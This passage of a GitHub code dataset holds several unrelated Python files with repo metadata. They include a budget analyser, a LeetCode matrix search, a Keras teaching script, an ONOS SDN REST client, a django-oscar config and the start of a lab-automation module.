profit_loss_total == 0:\n profit_loss_total = int(budget_item_match.group(2))\n profit_loss_high = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n profit_loss_low = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n new_key = 1\n budget[new_key] = (budget_item_match.group(1),int(budget_item_match.group(2)))\n elif error_condition == False:\n # At this point, I want to force our budget{} keys to be sequential regardless of how many blank lines there are:\n new_key += 1 \n budget[new_key] = (budget_item_match.group(1),int(budget_item_match.group(2)))\n profit_loss_total = profit_loss_total + int(budget_item_match.group(2))\n #Tracks the most recent high mark for monthly p/l\n if profit_loss_high[-1] <= int(budget_item_match.group(2)):\n profit_loss_high = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n #Tracks the most recent low mark for monthly p/l\n elif profit_loss_low[-1] >= int(budget_item_match.group(2)):\n profit_loss_low = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n\n # Now we're checking for a line we don't know what to do with: \n if not budget_item_match:\n # Next we skip the first row, where the header is expected.\n if i == 1:\n pass\n # Next we check for an empty line OR an empty line with whitespaces \n # (which is why using line == '\\n' would not comprehensively solve the issue).\n elif len(line.strip()) == 0:\n empty_lines.append(i)\n \n # Finally if there is still an issue, this whole line has formatting problems. So add it to our error_dict:\n else:\n error_dict[i] = [line, 'multiple issues']\n\n \n\n # Now we need to calculate the proper average. A dictionary isn't sorted inherently, but since we iterated new_key, all the key-value pairs match up\n # With the monthly progression of the data. So step 1) grab all the values from the budget dict and turn them into a list of:\n budget_tuples_list = list(budget.values())\n p_l_list = []\n deltas = []\n #step 2) loop through all the tuples and grab the profit from each month, creating a list of all the SEQUENTIAL CHANGES:\n for v in range(len(budget_tuples_list)):\n budget_tup = budget_tuples_list[v]\n p_l_list.append(budget_tup[1])\n #step 3) build a list of all the month-to-month deltas in p/l:\n if v >= 1:\n deltas.append(p_l_list[v] - p_l_list[v-1])\n average_deltas = (sum(deltas)/len(deltas))\n\n # The following are print statements:\n\n # returns empty lines to the user:\n if empty_lines:\n print(\"\\n\")\n print(f\"Empty Line(s) #: {empty_lines}\\n\")\n # Here is a fix for the ugly looking '\\n' on the tail of every error line:\n \n if error_dict.keys():\n \n \n for i in error_dict:\n nl_del = re.sub(r'$\\n','',error_dict[i][0]) # (this just gets rid of the \\n tail on the line)\n print(f\"Error on line # {i}: {error_dict[i][0]}' {error_dict[i][1]} ' caused an error\")\n print(f\"File must include 1 header row in first line\")\n print(f\"Date in first column (MON-YEAR, ex: JAN-2001)\")\n print(f\"Profit/loss in 2nd colummn without $ (ex: -189000)\")\n print(\"Please remove or reformat line(s), save the file, and retry\\n\")\n \n print(\"Financial Analysis\")\n print(\"----------------------------\")\n print(f\"Total Months: {new_key}\")\n print(f\"Total: {profit_loss_total}\")\n print(f\"Average Change: ${round(average_deltas,2)}\")\n print(f\"Greatest Increase in Profits: {profit_loss_high[0]} (${profit_loss_high[1]})\")\n print(f\"Greatest Decrease in Profits: {profit_loss_low[0]} (${profit_loss_low[1]})\")\n\n if summary:\n print(\"----------------------------\")\n print(\"\\ncreating summary file\\n...\")\n with open(\"summaryfile.txt\", \"w\") as summary_f:\n summary_f.write(\"Financial Analysis\\n----------------------------\\n\")\n summary_f.write(f\"Total Months: {new_key}\\n\")\n summary_f.write(f\"Total: {profit_loss_total}\\n\")\n summary_f.write(f\"Average Change: ${round(average_deltas,2)}\\n\")\n summary_f.write(f\"Greatest Increase in Profits: {profit_loss_high[0]} (${profit_loss_high[1]})\\n\")\n summary_f.write(f\"Greatest Decrease in Profits: {profit_loss_low[0]} (${profit_loss_low[1]})\\n\")\n summary_f.close()\n print(\"done\")\n return None \n\ndef main():\n # This is command-line parsing code.\n # Make a list of command line arguments, omitting the [0] element\n # which is the script itself.\n args = sys.argv[1:]\n if not args:\n print(\"usage: [--summaryfile] file [file...]\")\n sys.exit(1)\n\n # Notice the summary flag and remove it from args if it is present.\n summary = False\n if args[0] == \"--summaryfile\":\n summary = True\n del args [0]\n # Set the filename variable to the user input file\n filename = args[0]\n # Call the fin_analysis function\n fin_analysis(filename,summary)\n \n \n\nif __name__ == '__main__':\n main()","repo_name":"laramiedunlap/python_financial_summaries","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8152513946","text":"'''\nWrite an efficient algorithm that searches for a value in an m x n matrix.\nThis matrix has the following properties:\nIntegers in each row are sorted from left to right.\nThe first integer of each row is greater than the last integer of the previous row.\n\nExample 1:\nInput:\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 3\nOutput: true\n\nExample 2:\nInput:\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 13\nOutput: false\n'''\nclass Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n result = False\n if matrix == [[]] or matrix == []:\n return result\n\n arrayCol = [a[0] for a in matrix]\n left, right = self.binarySearch(arrayCol, target)\n if left != right and left >= 0 and right <= len(matrix):\n left, right = self.binarySearch(matrix[left], target)\n if left == right:\n result = True\n\n return result\n\n def binarySearch(self, nums, target):\n if nums == []:\n return 0, 0\n left, right = 0, len(nums) - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n if target < nums[mid]:\n right = mid - 1\n elif target > nums[mid]:\n left = mid + 1\n else:\n return mid, mid\n return left - 1, right + 1\n\n def searchMatrix1(self, matrix, target): # 此方法速度更快,是因为少了两次函数调用么?\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n if not matrix:\n return False\n\n m, n = len(matrix), len(matrix[0])\n # 可对二维数组中所有元素做二分查找,因为从左到右从上到下元素顺序排列\n left, right = 0, m * n\n while left < right:\n mid = left + (right - left) // 2\n if matrix[mid // n][mid % n] >= target:\n right = mid\n else:\n left = mid + 1\n\n return left < m * n and matrix[left // n][left % n] == target\n\n#print(Solution().binarySearch([1, 10, 23], 25))\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\nprint(Solution().searchMatrix(matrix, 50))\nprint(Solution().searchMatrix1(matrix, 50))","repo_name":"sasa233/myLeetcode","sub_path":"search-a-2d-matrix.py","file_name":"search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23217980086","text":"fact=lambda x: x*fact(x-1)if x else 1\ncomb=lambda n,r: fact(n)//(fact(r)*fact(n-r))\n\nfrom fractions import Fraction as F\n\ndef add(a, b):\n res = []\n A, B = len(a), len(b)\n for i in range(max(A, B)):\n try: _a = a[i]\n except: _a = 0\n try: _b = b[i]\n except: _b = 0\n res.append(_a+_b)\n return res\n\ndef mul(a, b):\n return list(map(lambda v: v*b, a))\n\ndef S(m):\n # return Polynomial f, that satisfies f(x) = 1^m+2^m+...+x^m\n # ex) S(1) = x(x+1)/2 = 1+2+..+x\n res = [[F(0), F(1)], [F(0), F(1, 2), F(1, 2)]]\n for i in range(3,m+2):\n a = [F(0)]\n for j in range(len(res)): a = add(a, mul(res[j], F((-1)**(i-j)*comb(i,j), i)))\n res.append(add(a, [F(0)]*i + [F(1, i)]))\n return res[-1]\n\ndef stringify(poly):\n res = []\n first = True\n for i in range(len(poly)-1, -1, -1):\n coef = poly[i]\n a, b = coef.numerator, coef.denominator\n if a == 0: continue\n sign = \"\" if first and a > 0 else \"-\" if first or a < 0 else \"+\"\n x = f\"x^{i}\" if i > 1 else \"x\" if i == 1 else \"\"\n _a = abs(a) if abs(a) != 1 else \"\"\n res += [ f\"{sign} {_a}{x}{f'/{b}' if b != 1 else ''} \" ]\n first = False\n return ''.join(res).strip()\n","repo_name":"pl-Steve28-lq/ProgrammingLanguages","sub_path":"Python/SummationFunction.py","file_name":"SummationFunction.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"9893471181","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Shaon Bhatta Shuvo\n\"\"\"\n#Importing Libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sklearn.datasets as skd\nfrom sklearn import preprocessing \nimport tensorflow.keras as tfk\nfrom sklearn.linear_model import LinearRegression \nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics \nfrom mlxtend.plotting import plot_decision_regions\n\n#Generating synthetic linear dataset \nX,y = skd.make_regression(n_samples=100, n_features=1, n_targets=1, bias=0.5, noise=5.5, random_state=42)\n\n#Reading dataset from csv file \n#dataframe = pd.read_csv(\"datasetName.csv\", header=None) #header=0 if first row/line is the header of the dataset\n#dataset = dataframe.values\n#Split into input (X) and output (Y) variables,\n#Lets say the dataset have n number of columns where the last column is the target value \n#therefore we have first n-2 columns as independent variables (inputs) and the (n-1)th column is the as output since index starts from 0\n#X = dataset[:,0:n-1] # when range is [start:end] value is read from start to end-1 index \n#y = dataset[:,n-1] # here it is not range is specific index\n\n# Visulalizing the synthetic dataset\nprint(\"\\nVisualizing the Synthetic Dataset\")\nplt.style.use(\"ggplot\")\nplt.scatter(X,y,color='red',edgecolors=\"green\")\nplt.title(\"Synthetic Dataset\")\nplt.xlabel(\"X\", fontsize=20)\nplt.ylabel(\"y\",rotation = 0, fontsize = 20)\nplt.show()\n\n#reshaping the y values into 2D matrix of 1 column\ny = y.reshape(-1,1) #if y is not an array then use, np.asanyarray(y).reshape(-1,1)\n# Equivalent code y = np.reshape(y,(-1,1))\n\n#Feature Scaling (Standardization : needs 2D array as input) \n#Here your data Z is rescaled such that μ = 0 and 𝛔 = 1, and is done through this formula: z= (Xi - μ)/𝛔\n#sc = preprocessing.StandardScaler()\n#X = sc.fit_transform(X)\n#y = sc.fit_transform(y)\n\n# Visulalizing the synthetic dataset after standardization \n#print(\"\\nVisualizing the Synthetic Dataset after Standardization\")\n#plt.style.use(\"ggplot\")\n#plt.scatter(X,y,color='red',edgecolors=\"green\")\n#plt.title(\"Synthetic Dataset\")\n#plt.xlabel(\"X\", fontsize=20)\n#plt.ylabel(\"y\",rotation = 0, fontsize = 20)\n#plt.show()\n\n#Spliting the dataset into Training and Testset\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n#Creating the deep learning model with hyperbolic tangent activation function \n\n#A shape (5,2,8) means an array or tensor with 3 dimensions, containing 5 elements in the first dimension, \n#2 in the second and 8 in the third, totaling 30*4*10 = 1200 elements or numbers.\n#What flows between layers are tensors. Tensors can be seen as matrices, with shapes.\n#In Keras, the input layer itself is not a layer, but a tensor. It's the starting tensor you send to the first \n#hidden layer. This tensor must have the same shape as your training data.\n#In our example input data is one dimentional and also has only one element (column). \nmodel = tfk.Sequential([\n tfk.Input(shape = (1,)), \n tfk.layers.Dense(50, activation='tanh'), #first hidden layer\n tfk.layers.Dense(100, activation='tanh'), #second hidden layer\n tfk.layers.Dense(1,) #activation linear by default, also can add: activation ='linear' \n ])\n#model Looks like: 1 input -> [50 units in layer1] ->[100 units in layer2] -> 1 output\n\n#Compiling the model with Stochatstic Gradient Discent optimizer and MSE as the loss function\nmodel.compile(optimizer=tfk.optimizers.SGD(lr=0.001), loss='mean_squared_error', metrices=['mean_squared_error'])\n#Model's Summary\nmodel.summary()\n#Training the model \ntraining = model.fit(X_train,y_train, epochs = 50, batch_size =10)\n#Testing the models performance \ny_pred = model.predict(X_test)\nmse = metrics.mean_squared_error(y_test,y_pred)\nprint(\"Testset Result: \\n---------------\")\nprint(\"MSE: \", mse)\n\n#Visualizing training loss values\nplt.plot(training.history['loss'], label='Training Loss')\nplt.title('Model Loss')\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.legend()\n\n#Reshapping the matrix into array to pass the value into np.linspace() for 2D visualizaiton. \nx_train_arr = np.asarray(X_train).reshape(-1)\ny_train_arr = np.asarray(y_train).reshape(-1)\nx_test_arr = np.asarray(X_test).reshape(-1)\ny_test_arr = np.asarray(y_test).reshape(-1)\n#Creating evenly spaced values for smooth visulatization\nxp_train = np.linspace(x_train_arr.min(), x_train_arr.max())\nxp_test = np.linspace(x_test_arr.min(), x_test_arr.max())\n\n#Visulalizing training and testing plots. \nfig, ax = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nax[0].scatter (X_train, y_train, color='red', edgecolors='green', label='Synthetic Data Points')\nax[0].plot(xp_train,model.predict(xp_train.reshape(-1)),color='blue', label='Regression Line')\nax[0].set_title(\"NN Regression Plot (Training Set)\")\nax[0].set_xlabel(\"X_train\", fontsize=20)\nax[0].set_ylabel(\"y_train\", fontsize = 20)\nax[0].legend()\nax[1].scatter(X_test,y_test,color='red', edgecolors='green', label='Synthetic Data Points')\nax[1].plot(xp_test,model.predict(xp_test.reshape(-1)),color='blue',label='Regression Line')\nax[1].set_title(\"NN Regression Plot (Testing Set)\")\nax[1].set_xlabel(\"X_test\", fontsize=20)\nax[1].set_ylabel(\"y_test\", fontsize = 20)\nax[1].legend()\nplt.tight_layout()\nplt.show()\n\n#Creating Linear Regression Model\nlr_model = LinearRegression()\n#Training the model\nlr_model.fit(X_train,y_train)\n#Testing the model's performance\ny_pred_lr = lr_model.predict(X_test)\nmse = metrics.mean_squared_error(y_test,y_pred_lr)\nprint(\"MSE: \", mse)\n\n#Visualizing the Training and Testset performance of Linear Regression\nfig, ax = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nax[0].scatter (X_train, y_train, color='red', edgecolors='green', label='Synthetic Data Points')\nax[0].plot(X_train,lr_model.predict(X_train),color='blue', label='Regression Line')\nax[0].set_title(\"Linear Regression Plot (Training Set)\")\nax[0].set_xlabel(\"X_train\", fontsize=20)\nax[0].set_ylabel(\"y_train\", fontsize = 20)\nax[0].legend()\nax[1].scatter(X_test,y_test,color='red', edgecolors='green', label='Synthetic Data Points')\nax[1].plot(X_test,lr_model.predict(X_test),color='blue',label='Regression Line')\nax[1].set_title(\"Linear Regression Plot (Testing Set)\")\nax[1].set_xlabel(\"X_test\", fontsize=20)\nax[1].set_ylabel(\"y_test\", fontsize = 20)\nax[1].legend()\nplt.tight_layout()\nplt.show()\n\n#Generating synthetic non-linear data to solve classification problem\nX,y = skd.make_circles(n_samples=100, shuffle=False, noise=None, random_state=None, factor=0.5)\n\n#Following classes will not be shapped as circle, parameters can be changed to make it more non-linear\n#X, y = skd.make_classification(n_samples=100, n_features=2, n_redundant=0, n_informative=2,\n# n_clusters_per_class=1,class_sep=0.5,flip_y=0.2, random_state=1,shuffle=False)\n\n#Finding and counting unique elements. \nunique_elements, counts_elements = np.unique(y, return_counts=True)\nprint(\"Frequency of unique class of the dataset:\")\nprint(np.asarray((unique_elements, counts_elements)))\n\n#Visualizing the synthetic dataset of Class 1 and Class -1: \nplt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'g^', label='Class: 0')\nplt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'ro' , label=\"Class: 1\")\nplt.title(\"Visualizing the synthetic dataset of class 1 and 0\")\nplt.xlabel(\"X1\")\nplt.ylabel(\"X2\")\nplt.legend()\nplt.show() \n\n#Spliting the dataset into train and testset\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\nprint(\"Frequency of unique class of elements in the test set:\")\nunique_elements_test, count_elements_test=np.unique(y_test, return_counts=True)\nprint(unique_elements_test, count_elements_test)\n\n#Creating validation set by copying last 10 elements from the training set\nX_val = X_train[70:]\ny_val = y_train[70:]\n#Removing the validation set (last 10 elements) from training set\nX_train = X_train[:70]\ny_train = y_train[:70]\n\n#Creating the deep learning model (Lets try a differnt apprach, can be used same approach shown earlier) \nmodel = tfk.Sequential()\nmodel.add(tfk.layers.Dense(50,input_shape=(2,), activation='relu')) #First Hidden Layer\nmodel.add(tfk.layers.Dense(100, activation='relu')) #Second Hidden Layer\nmodel.add(tfk.layers.Dense(1, activation='sigmoid')) #Output Layer\n\n#Model can be crated using following approach as well\n#input_units = tfk.Input(shape=(2,))\n#hidden_layer1 = tfk.layers.Dense(100, activation ='relu')((input_units))\n#hidden_layer2 = tfk.layers.Dense(50, activation ='relu')(hidden_layer1)\n#prediction = tfk.layers.Dense(1, activation ='sigmoid')(hidden_layer2)\n#model = tfk.models.Model(inputs=input_units, outputs=prediction)\n\n#model Looks like: 2 input -> [50 units in layer1] ->[100 units in layer2] -> 1 output\n\n# Compiling the model for binary classification # Use loss = categorical_crossentropy for multiclass prediction. \nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) \n#Model's Summary\nmodel.summary()\n\n#Training the model \ntraining = model.fit(X_train,y_train, epochs = 50, batch_size =10, validation_data =(X_val,y_val))\n\n#Visulaizing the Training and Validation Sets Loss and Accuracy\nfig, axes = plt.subplots(nrows=1, ncols=2, figsize=(8,4))\n#Plot training and validation accuracy values\n#axes[0].set_ylim(0,1) #if we want to limit axis in certain range\naxes[0].plot(training.history['accuracy'], label='Train')\naxes[0].plot(training.history['val_accuracy'], label='Validation')\naxes[0].set_title('Model Accuracy')\naxes[0].set_xlabel('Epoch')\naxes[0].set_ylabel('Accuracy')\naxes[0].legend()\n#Plot training and validation loss values\n#axes[1].set_ylim(0,1)\naxes[1].plot(training.history['loss'], label='Train')\naxes[1].plot(training.history['val_loss'], label='Validation')\naxes[1].set_title('Model Loss')\naxes[1].set_xlabel('Epoch')\naxes[1].set_ylabel('Loss')\naxes[1].legend()\nplt.tight_layout()\nplt.show()\n\n# Evaluating the performance on the Test set \ntest_loss_accuracy = model.evaluate(X_test, y_test, verbose=2)\n\n# Visualising the Training and Test set plot decision area\nfig, axes = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nfig1 = plot_decision_regions(X_train, y_train, clf=model, ax=axes[0], legend=0)\nfig2 = plot_decision_regions(X_test, y_test, clf=model, ax=axes[1], legend=0)\naxes[0].set_title('NN Plot Decision Region (Training set)')\naxes[0].set_xlabel('x1')\naxes[0].set_ylabel('x2')\naxes[1].set_title('NN Plot Decision Region (Test set)')\naxes[1].set_xlabel('x1')\naxes[1].set_ylabel('x2')\n\nhandles, labels = fig1.get_legend_handles_labels()\nfig1.legend(handles, \n ['class 0', 'class 1'])\nfig2.legend(handles, \n ['class 0', 'class 1'])\n\nplt.tight_layout()\nplt.show()\n\n# Predicting the Test set results\ny_pred = model.predict(X_test)\n# Converting the predicted result into desired class level\n# Singmoid produce the output between 0 and 1. Therefore, the decision boundary for sigmoid is 0.5\nfor i in range(0, len(y_pred)):\n if(y_pred[i]>0.5):\n y_pred[i] = 1\n else:\n y_pred[i] = 0\n\n# Generating confusion matrics, details classification report\ncm = metrics.confusion_matrix(y_test,y_pred)\nprint(\"Confusion Matrix for Neural Network Model:\\n \",cm)\nprint( \"{0}\".format(metrics.classification_report(y_test,y_pred)))\n# Generating accuracy in %, \n# Similary precision_score and recall_score can be used to generate precision and recall seperately\naccuracy_test = metrics.accuracy_score(y_test,y_pred)*100\nprint('Accuracy:%.2f' % accuracy_test,\"%\")\n\n# Using non-linear svm calssifier , use kernel=linear for linear classifier. \nfrom sklearn import svm\nclassifier = svm.SVC(kernel='rbf') #rbf = 'radial basis function' for non-linear classification\nclassifier.fit(X_train,y_train)\n\n# Predicting Teset set result\ny_pred = classifier.predict(X_test)\n\n# Generating confusion matrics, details classification report\ncm = metrics.confusion_matrix(y_test,y_pred)\nprint(\"Confusion Matrix for SVM Clssifer:\\n \",cm)\nprint( \"{0}\".format(metrics.classification_report(y_test,y_pred)))\n# Generating accuracy in %, \n# Similary precision_score and recall_score can be used to generate precision and recall seperately\naccuracy_test = metrics.accuracy_score(y_test,y_pred)*100\nprint('Accuracy:%.2f' % accuracy_test,\"%\")\n\n# Visualising the Training and Test set plot decision area\nfig, axes = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nfig1 = plot_decision_regions(X_train, y_train, clf=classifier, ax=axes[0], legend=0)\nfig2 = plot_decision_regions(X_test, y_test, clf=classifier, ax=axes[1], legend=0)\naxes[0].set_title('SVM Plot Decision Region (Training set)')\naxes[0].set_xlabel('x1')\naxes[0].set_ylabel('x2')\naxes[1].set_title('SVM Plot Decision Region (Test set)')\naxes[1].set_xlabel('x1')\naxes[1].set_ylabel('x2')\nhandles, labels = fig1.get_legend_handles_labels()\nfig1.legend(handles, \n ['class 0', 'class 1'])\nfig2.legend(handles, \n ['class 0', 'class 1'])\n\nplt.tight_layout()\nplt.show()\n","repo_name":"parth-patel09/Deep-Learning-Workshop","sub_path":"WorshopDL_(Part1).py","file_name":"WorshopDL_(Part1).py","file_ext":"py","file_size_in_byte":12984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10100846067","text":"# Agenda com: Cadastros e leitura\nagenda = {}\nwhile True:\n print(\"1 = Cadastro\\n2 = Leitura\\n3 = Sair\")\n opção = int(input(\"O que você deseja fazer? \"))\n if opção == 1: \n nome = input(\"Nome:\")\n idade = int(input(\"Idade: \"))\n cpf = int(input(\"Digite o apenas os dígitos do cpf: \"))\n agenda[nome] = idade, cpf\n print(\"Usuário cadastrado!\")\n elif opção == 2:\n menores = {}\n for n, i in agenda:\n if i < 18:\n menores[n]\n for n in menores.keys():\n agenda.pop(n)\n print(f\"Maiores de idade: {agenda}\\n Menores de idade: {menores}\")\n elif opção == 3:\n print(\"Fim do programa\")\n break\n","repo_name":"Caillouren/Projeto-FlyFood","sub_path":"Exercícios/Exercício Agenda.py","file_name":"Exercício Agenda.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42339245057","text":"import json\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n\nclass OnosRestAPI():\n\n def __init__(self):\n self.controller_ip = '192.168.139.137.5'\n self.api_url = 'http://%s:8181/onos/v1' % self.controller_ip\n self.credentials = ('onos', 'rocks')\n\n def get_devices(self):\n \"Returns network devices file\"\n\n url = self.api_url + '/devices'\n response = requests.get(url, auth=self.credentials)\n return response.json()\n\n def get_hosts(self):\n \"Returns network devices file\"\n\n url = self.api_url + '/hosts'\n response = requests.get(url, auth=self.credentials)\n return response.json()\n\n def get_network_config(self):\n \"Returns network configuration file\" \n\n url = self.api_url + '/network/configuration'\n response = requests.get(url, auth=self.credentials)\n # return json.dumps(response.json(), indent=4, sort_keys=False)\n return response.json()\n\n def push_network_config(self, cfg_path):\n \"Send network configuration to controller\"\n\n url = self.api_url + '/network/configuration'\n config_file = json.dumps(self.load_json(cfg_path))\n\n response = requests.post(url, data=config_file, \n headers={\"Content-Type\": \"application/json, Accept: application/json\"})\n\n def load_json(self, path):\n \"Loads json from file\"\n with open(path) as f:\n return json.load(f)\n\n def get_device_id(self, devices):\n for device in devices['devices']:\n print(device['available'])\n\n def del_device(self, device_id):\n \"Delete device with given id\"\n url = self.api_url + '/devices/' + device_id\n response = requests.delete(url, auth=self.credentials)\n print(response)\n \n def delete_unavailable_devices(self):\n devices = self.get_devices()\n for device in devices['devices']:\n if device['available'] == False:\n print('Deleting device with id: ' + device['id'])\n self.del_device(device['id'])\n\n def delete_all_devices(self):\n devices = self.get_devices()\n for device in devices['devices']:\n print('Deleting device with id: ' + device['id'])\n self.del_device(device['id'])\n\n def get_all_flows(self):\n url = self.api_url + '/flows'\n response = requests.get(url, auth=self.credentials)\n return response.json()\n\n def del_all_flows(self):\n \"Doesn't work - to be finnished\"\n url = url = self.api_url + '/flows'\n flows = self.get_all_flows()\n response = requests.delete(url, data=flows, auth=self.credentials, headers={\"Content-Type\": \"application/json\"})\n print(response)\n\n \n\n\n\n\n\n\ncontroller = OnosRestAPI()\ncontroller.delete_unavailable_devices()\n# print(json.dumps(controller.get_all_flows(), indent=4))\n# print(json.dumps(controller.get_devices(), indent=4))\n# print(json.dumps(controller.get_hosts(), indent=4))\n\n","repo_name":"Suazi/SDN","sub_path":"rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6264462215","text":"from django.urls import re_path\n\nfrom oscar.apps.catalogue import apps\n\n\nclass CatalogueConfig(apps.CatalogueConfig):\n name = \"tests._site.apps.catalogue\"\n\n def get_urls(self):\n from .views import ParentProductDetailView\n\n urls = super().get_urls()\n urls += [\n re_path(\n r\"^parent/(?P[\\w-]*)_(?P\\d+)/$\",\n ParentProductDetailView.as_view(),\n name=\"parent_detail\",\n )\n ]\n return self.post_process_urls(urls)\n","repo_name":"django-oscar/django-oscar","sub_path":"tests/_site/apps/catalogue/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"29393512621","text":"# Flab\r\n# Distributed under GNU GPL v3\r\n# Author: Nicholas Jose\r\n\r\n\"\"\"\r\nThe Flab module contains the Flab and FlabNamespace classes, which are used for sharing of attributes,\r\nmethods, variables and other objects\r\n\"\"\"\r\n\r\nfrom flab import TaskManager, UiManager, DeviceManager\r\nimport time\r\nimport os\r\nimport sys\r\nimport inspect\r\n\r\n\r\nclass Flab(DeviceManager.DeviceManager, TaskManager.TaskManager, UiManager.UiManager):\r\n \"\"\"Flab inherits DeviceManager, TaskManager, UiManager and BotManager and contains dictionaries for\r\n devices, tasks, vars, uis and bots.\r\n \"\"\"\r\n version = '2.0.7'\r\n modules = {} # module dictionary\r\n\r\n def __init__(self, ui_queue=None, flab_queue=None, print_status=True):\r\n \"\"\"\r\n Constructs the Flab object, containing empty dictionaries\r\n\r\n Flab objects can be constructed with two queues for exchanging information between processes.\r\n\r\n :param ui_queue: queue object that passes information to UI processes, defaults to None\r\n :type ui_queue: multiprocessing.Queue(,queue.Queue)\r\n\r\n :param flab_queue: queue object that passes information to flab processes, defaults to None\r\n :type flab_queue: multiprocessing.Queue(,queue.Queue)\r\n\r\n :param print_status: a boolean indicating if output should be sent to the command prompt, defaults to True\r\n\r\n :returns: None\r\n \"\"\"\r\n\r\n self.ui_queue = ui_queue\r\n self.flab_queue = flab_queue\r\n self.devices = {} # device dictionary\r\n self.tasks = {} # task dictionary\r\n self.vars = {} # variable dictionary\r\n self.uis = {} # UI dictionary\r\n self.bots = {} # bot dictionary\r\n self.print_status = print_status # True if outputs are to be displayed through the python console\r\n self.is_running = True # True if flab has been initiated within a running program\r\n\r\n def add_var(self, value, variable_name) -> None:\r\n \"\"\"adds a variable with a given value to the variable dictionary\r\n\r\n :param value: value of the variable\r\n :type value: numbers, strings, lists, objects, etc.\r\n\r\n :param variable_name: the name of the variable\r\n :type variable_name: str\r\n\r\n :return: None\r\n\r\n Do not use devices, tasks, bots or uis in the variable dictionary.\r\n Avoid nested dictionaries and complex objects.\r\n\r\n \"\"\"\r\n\r\n try:\r\n self.vars[variable_name] = value\r\n except Exception as e:\r\n self.flab.display('Error when adding to variable dictionary')\r\n self.flab.display(e)\r\n # raise Exception('Error in Flab.add_var')\r\n finally:\r\n pass\r\n\r\n def display(self, object) -> None:\r\n \"\"\"\r\n Displays an object by printing to the command prompt and/or passing to ui_queue\r\n\r\n :param object: an object\r\n\r\n :returns: None\r\n \"\"\"\r\n try:\r\n if self.print_status:\r\n print(object)\r\n if self.ui_queue is not None:\r\n self.ui_queue.put(object)\r\n except Exception as e:\r\n if self.print_status:\r\n print('Error in Flab.display')\r\n print(e)\r\n if self.ui_queue is not None:\r\n self.ui_queue.put('Error in Flab.display')\r\n self.ui_queue.put(e)\r\n finally:\r\n pass\r\n\r\n #\r\n def message(self, text) -> None:\r\n \"\"\"\r\n Displays a message. For example, message('HelloWorld') leads to the\r\n display of \"message: Hello World\"\r\n\r\n :param text: whatever you want to send a message about\r\n :type text: str\r\n\r\n :returns: None\r\n \"\"\"\r\n\r\n try:\r\n s = 'message: ' + text\r\n self.display(s)\r\n except Exception as e:\r\n self.display('Error in Flab.message')\r\n self.display(e)\r\n finally:\r\n pass\r\n\r\n # Actions to take when closing flab\r\n def close_flab(self) -> None:\r\n \"\"\"\r\n Ends all running processes and tasks within a Flab object\r\n\r\n :return: None\r\n \"\"\"\r\n try:\r\n # stop all running tasks\r\n self.display('stopping running tasks')\r\n self.stop_all_tasks()\r\n while self.get_running_task_names():\r\n time.sleep(1)\r\n self.is_running = False\r\n if self.flab_queue is not None:\r\n self.display('closing flab process')\r\n self.flab_queue.put('close')\r\n if self.ui_queue is not None:\r\n self.display('closing ui process')\r\n self.ui_queue.put('close')\r\n except Exception as e:\r\n self.display('Error in Flab.close_flab')\r\n self.display(e)\r\n finally:\r\n return 0\r\n\r\n def close_queues(self) -> None:\r\n \"\"\"\r\n Closes any open queues\r\n\r\n :return: None\r\n \"\"\"\r\n try:\r\n if self.ui_queue is not None:\r\n self.ui_queue.close()\r\n if self.flab_queue is not None:\r\n self.flab_queue.close()\r\n except Exception as e:\r\n self.display('Error in Flab.close_queues')\r\n self.display(e)\r\n finally:\r\n pass\r\n\r\n def create_project_directory(self, parent_path, project_name) -> None:\r\n \"\"\"\r\n\r\n Creates a project directory with a given name at a given parent path\r\n\r\n For example, create_project_directory('C:/Projects','MyFirstProject') yields a directory\r\n with the following structure.\r\n\r\n C:/Projects/\r\n\r\n └ MyFirstProject/\r\n\r\n ├ Boot/\r\n\r\n ├ Tasks/\r\n\r\n ├ Devices/\r\n\r\n │ ├ Drivers/\r\n\r\n │ └ Protocols/\r\n\r\n ├ 